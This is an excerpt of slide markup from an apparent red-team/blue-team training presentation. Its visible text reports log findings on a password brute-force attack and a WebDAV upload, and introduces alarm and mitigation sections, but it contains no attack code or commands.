            <a:ext cx="4702673" cy="320941"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Straight Arrow Connector 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27AA85D1-F97E-4848-B940-C37E8A91AF85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7646946" y="3630162"/>
            <a:ext cx="94147" cy="198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Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B29DBA-155D-46E2-BF84-F294E5493561}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9222996" y="4461122"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C1646C6-B0C5-47E5-85AC-60A9823A3F55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4936E92-F5FB-4D0C-A328-7FC0933698BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="582450" y="673970"/>
            <a:ext cx="3216651" cy="1813180"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5814EF8-7474-41AB-843C-1B66B939545B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4079684" y="1881235"/>
            <a:ext cx="4528091" cy="1727134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="Picture 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6548932-05DB-40C3-857A-7EE8E721419D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId8"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="105676" y="3042065"/>
            <a:ext cx="3693425" cy="117619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latin typeface="Bahnschrift SemiLight Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Table of Contents</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift SemiLight Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>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000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift SemiLight Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>This document contains the following sections:</a:t>
            </a:r>
            <a:endParaRPr sz="2000" dirty="0">
              <a:latin typeface="Bahnschrift SemiLight Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>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Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr dirty="0"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="1378813"/>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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Network Topology</a:t>
            </a:r>
            <a:endParaRPr sz="2000" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Red Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Security Assessment</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto" panose="02000000000000000000" pitchFamily="2" charset="0"/>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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Log Analysis and Attack Characterization</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>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2000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Hardening</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Proposed Alarms and Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto"/>
              <a:cs typeface="Roboto"/>
              <a:sym typeface="Roboto"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C120C363-9979-4224-87CF-5D41A38DC420}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Uncovering the Brute Force Attack</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1183" name="Google Shape;1183;p67"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12701" y="777914"/>
            <a:ext cx="6448401"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latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In total 15,819 requests were made on the 16</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" baseline="30000" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>th</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> October 2021 at 01:11:10 UTC.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>15,814 (code 401) requests were made before the password was cracked (code 301).</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CDDE483-56C8-4F6F-99EC-F0733D650E7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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20</a:t>
            </a:fld>
            <a:endParaRPr sz="600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C54954A-BFB0-4EA6-B506-514DE273A9D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Chevron arrows">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDF878E4-2C05-4750-BA4F-C5976C51B3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699" y="777914"/>
            <a:ext cx="388447" cy="388447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BAB4C26E-214E-4E5F-B4A1-2D861EA5DC44}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="227413" y="1553256"/>
            <a:ext cx="4336705" cy="1395142"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E7A641B9-2AD6-40F8-A0B0-E632FF3CC6F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4662901" y="1684738"/>
            <a:ext cx="4336705" cy="1251326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{966FDB2C-CBD2-44D0-80FC-A20EDF19C3FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1826086" y="3162010"/>
            <a:ext cx="5491828" cy="158161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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:cs typeface="MV Boli" panose="02000500030200090000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Analysis: Finding the WebDAV Connection</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:cs typeface="MV Boli" panose="02000500030200090000" pitchFamily="2" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1193" name="Google Shape;1193;p68"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="680511"/>
            <a:ext cx="5901352" cy="659678"/>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latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>In total 32 requests were made to the webdav directory.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="320040" lvl="0" indent="-167640" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:latin typeface="Bahnschrift Light SemiCondensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The files passwd.dav and shell.php were requested.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Google Shape;1066;p58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{928FB9D1-FECD-47CF-93C5-6126FDC14B89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Google Shape;1111;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1366FA5E-D4E1-4DF8-81E6-6CC4108FC176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12700" y="4916488"/>
            <a:ext cx="7972425" cy="227012"/>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US" sz="1000" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Presented by: Richard Brantsch</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Graphic 9" descr="Chevron arrows">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C246D70-76DC-44BC-A220-C71D1CEE88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699" y="777914"/>
            <a:ext cx="388447" cy="388447"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B815EE7-A699-4822-B912-4C87E57C56FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="531146" y="1487000"/>
            <a:ext cx="6174190" cy="925052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B08BD71-B88A-4F6F-BC62-6E40FAE3CEC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3116782" y="3844625"/>
            <a:ext cx="5543739" cy="877581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1680B3-6BA0-4EF1-BE27-4D0ABEE693A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1518746" y="2687395"/>
            <a:ext cx="5635468" cy="88188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latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Blue Team</a:t>
            </a:r>
            <a:endParaRPr sz="4000" b="1" dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Proposed Alarms and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="2800" dirty="0">
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Mitigation Strategies</a:t>
            </a:r>
            <a:endParaRPr sz="2800" dirty="0">
              <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              <a:ea typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
              <a:sym typeface="Roboto Light"/>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22</a:t>
            </a:fld>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Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigation: Blocking the Port Scan</a:t>
            </a:r>
            <a:endParaRPr dirty="0">
              <a:latin typeface="Bahnschrift Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;p70"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
